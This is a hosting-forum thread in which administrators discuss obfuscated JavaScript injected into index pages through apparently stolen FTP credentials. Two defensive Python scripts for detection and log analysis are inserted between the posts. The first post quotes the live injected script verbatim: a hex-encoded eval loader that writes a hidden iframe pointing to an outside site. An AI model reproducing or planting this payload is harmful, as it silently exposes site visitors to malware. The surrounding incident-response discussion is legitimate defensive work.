
Code Injection

Discussion in 'General Discussion' started by HostingH, Jul 19, 2011.

  1. HostingH

    HostingH Well-Known Member

    Joined:
    Jan 13, 2008
    Messages:
    73
    Likes Received:
    3
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Hi,

    We are facing a problem with code injection, only in index pages, on our servers. In messages we found uploading and downloading of index pages from one IP for all users. Following is the code that has been injected.
    =============
    <script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
    =============

    How can we prevent this? Please advise us.
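The injected script in this post hides its real content as a hex string that is decoded two characters at a time and passed to eval(). The following detector, an added example rather than anything from the thread or from cPanel, finds that pattern in web files and decodes the hidden payload so an administrator can see where the iframe points; the sample page and its example.invalid URL are constructed for the demonstration.

```python
import re
from pathlib import Path

# Obfuscation pattern from the thread: a long hex string assigned to a variable,
# decoded two characters at a time with String.fromCharCode and handed to eval().
HEX_VAR = re.compile(r'var\s+\w+\s*=\s*"([0-9a-fA-F]{40,})"')
DECODER = re.compile(r'String\.fromCharCode\s*\(\s*parseInt\s*\(.*?,\s*16\s*\)')
EVAL = re.compile(r'\beval\s*\(')


def decode_hex_payload(hexstr):
    """Decode a two-hex-digits-per-character string the way the injected loop does."""
    even = hexstr[: len(hexstr) // 2 * 2]  # ignore a dangling odd nibble
    return bytes.fromhex(even).decode("latin-1")


def find_injections(text):
    """Return the decoded payload of every hex-eval <script> block found in text."""
    found = []
    for block in re.findall(r"<script>(.*?)</script>", text, flags=re.S | re.I):
        if not (DECODER.search(block) and EVAL.search(block)):
            continue
        for hexstr in HEX_VAR.findall(block):
            found.append(decode_hex_payload(hexstr))
    return found


def scan_tree(root, names=("index.php", "index.html", "wp-blog-header.php")):
    """Walk root and map each infected file path to its decoded payloads."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.name in names and path.is_file():
            payloads = find_injections(path.read_text(errors="replace"))
            if payloads:
                hits[str(path)] = payloads
    return hits


# Constructed sample (not the payload from the thread): same loop structure,
# carrying a hex-encoded iframe that points at a reserved, non-routable name.
SAMPLE_PAYLOAD = "document.write('<iframe src=\"http://example.invalid/f.php\" width=\"1\" height=\"1\"></iframe>')"
SAMPLE_PAGE = (
    "<html><body>Welcome</body></html>\n"
    '<script>var t="";var arr="' + SAMPLE_PAYLOAD.encode().hex() + '";'
    "for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));"
    "eval(t);</script>"
)

if __name__ == "__main__":
    for payload in find_injections(SAMPLE_PAGE):
        print("decoded injected payload:", payload)
```

Run scan_tree("/home") on the server to list every index file carrying the pattern before cleaning them; the decoded string tells you which domain the iframe was loading.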
     
  2. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    What script was running that had the code injection or how was it accomplished precisely?

    Do you have ModSecurity running on the machine? It might not have prevented the issue, but it could be useful to run on the machine regardless.

    Next, do you have register_globals set to Off for the global php.ini file and, if you are using suPHP, are you preventing users from creating their own php.ini file?
     
  3. mikegotroot

    mikegotroot Well-Known Member

    Joined:
    Apr 29, 2008
    Messages:
    85
    Likes Received:
    1
    Trophy Points:
    8
    Are you sure this was via a web injection? The code may have also been added to the file via FTP, or shell (which is usually the case if a file is modified). Do you see anything in your logs that would tell you this is web based, and not uploaded code?
     
  4. HostingH

    HostingH Well-Known Member

    Joined:
    Jan 13, 2008
    Messages:
    73
    Likes Received:
    3
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Hi,

    Thanks for your help,

    We are using suPHP, ModSecurity, and register_globals is off.

    We found the following logs for every user, with the same IP that is downloading and uploading index pages continuously.

    xx.xx.xx.xx >> is the hacker's IP
    ======================
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-blog-header.php uploaded (664 bytes, 17.76KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php downloaded (32 bytes, 165.29KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/index.php uploaded (420 bytes, 11.62KB/sec)
    Jul 16 23:09:47 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html downloaded (4433 bytes, 220.11KB/sec)
    Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizer/index.html uploaded (4277 bytes, 102.88KB/sec)
    Jul 16 23:09:48 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//tmp/webalizerftp/index.html downloaded (6100 bytes, 190.80KB/sec)
    Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php downloaded (32 bytes, 1.27KB/sec)
    Jul 16 23:09:50 vital pure-ftpd: (username@xx.xx.xx.xx) [NOTICE] /home/username//public_html/wp-content/themes/index.php
    ======================

    We are not sure how this could happen.

    Please advise us.
     
    #4 HostingH, Jul 20, 2011
    Last edited: Jul 20, 2011
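The pure-ftpd lines above show one client IP touching index files in many different accounts within seconds, which is the signature of stolen FTP credentials rather than a web exploit. This added example (not from the thread or from cPanel) parses lines in that exact format from /var/log/messages and reports every IP that uploaded into more than one account; the sample lines, IPs and usernames are constructed, and a truncated line like the last one in the post is skipped rather than mis-parsed.

```python
import re
from collections import defaultdict

# pure-ftpd NOTICE line as it appears in the thread's log excerpt.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ pure-ftpd: "
    r"\((?P<user>[^@)]+)@(?P<ip>[\d.]+)\) \[NOTICE\] "
    r"(?P<path>\S+) (?P<action>uploaded|downloaded)"
)


def parse(log_text):
    """Yield one dict per well-formed transfer line; truncated lines are skipped."""
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m:
            yield m.groupdict()


def uploads_by_ip(log_text):
    """Map each client IP to the set of accounts it uploaded files into."""
    seen = defaultdict(set)
    for rec in parse(log_text):
        if rec["action"] == "uploaded":
            seen[rec["ip"]].add(rec["user"])
    return seen


def suspicious_ips(log_text, min_accounts=2):
    """IPs that pushed files into at least min_accounts different accounts."""
    return sorted(ip for ip, users in uploads_by_ip(log_text).items()
                  if len(users) >= min_accounts)


# Constructed sample lines in the thread's format (IPs and usernames are made up).
SAMPLE_LOG = """\
Jul 16 23:09:47 vital pure-ftpd: (alice@203.0.113.7) [NOTICE] /home/alice//public_html/wp-content/index.php downloaded (32 bytes, 165.29KB/sec)
Jul 16 23:09:47 vital pure-ftpd: (alice@203.0.113.7) [NOTICE] /home/alice//public_html/wp-content/index.php uploaded (420 bytes, 11.62KB/sec)
Jul 16 23:09:48 vital pure-ftpd: (bob@203.0.113.7) [NOTICE] /home/bob//public_html/index.html uploaded (4277 bytes, 102.88KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (carol@198.51.100.9) [NOTICE] /home/carol//public_html/index.php uploaded (900 bytes, 50.00KB/sec)
Jul 16 23:09:50 vital pure-ftpd: (bob@203.0.113.7) [NOTICE] /home/bob//public_html/wp-content/themes/index.php
"""

if __name__ == "__main__":
    for ip in suspicious_ips(SAMPLE_LOG):
        print(ip, "uploaded into accounts:", sorted(uploads_by_ip(SAMPLE_LOG)[ip]))
```

Feed it the real messages file and the IPs it lists are the ones to block at the firewall and to use when deciding which accounts need their FTP passwords reset.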
  5. Defected

    Defected Member

    Joined:
    Dec 14, 2009
    Messages:
    17
    Likes Received:
    0
    Trophy Points:
    1
    1) Change the password for that account.
    2) Tell the account owner to scan his computer with antivirus/antimalware/antispyware software.
    3) Scan your pc's too.
    4) Remove the injected code from the account files.

    I believe this is a typical "client" side issue, where the computer is infected via the use of some sort of "cracked" software and the account credentials get stolen.
     
  6. HostingH

    HostingH Well-Known Member

    Joined:
    Jan 13, 2008
    Messages:
    73
    Likes Received:
    3
    Trophy Points:
    6
    cPanel Access Level:
    Root Administrator
    Hello Defected,

    Thanks for your help... but this is not for only one account... all our servers are having the same issue with all accounts. So please guide us on how we can prevent this in future.
     
  7. cPanelTristan

    cPanelTristan Quality Assurance Analyst
    Staff Member

    Joined:
    Oct 2, 2010
    Messages:
    7,623
    Likes Received:
    21
    Trophy Points:
    38
    Location:
    somewhere over the rainbow
    cPanel Access Level:
    Root Administrator
    Are you forcing TLS for FTP connections in WHM > FTP Server Configuration area for the "TLS Encryption Support" dropdown? I would highly suggest changing it to "Required (Command/Data)" there.

    Next, I would suggest enabling Configure Security Policies area in WHM to force password strength and password age requirements. This will make all users have to change their passwords and have a strong password.

    For your customers, do you have another login system they use where you are storing their cPanel passwords somewhere? If your users have a login area like a billing system and you are storing passwords in that system, please ensure those passwords are being encrypted.
     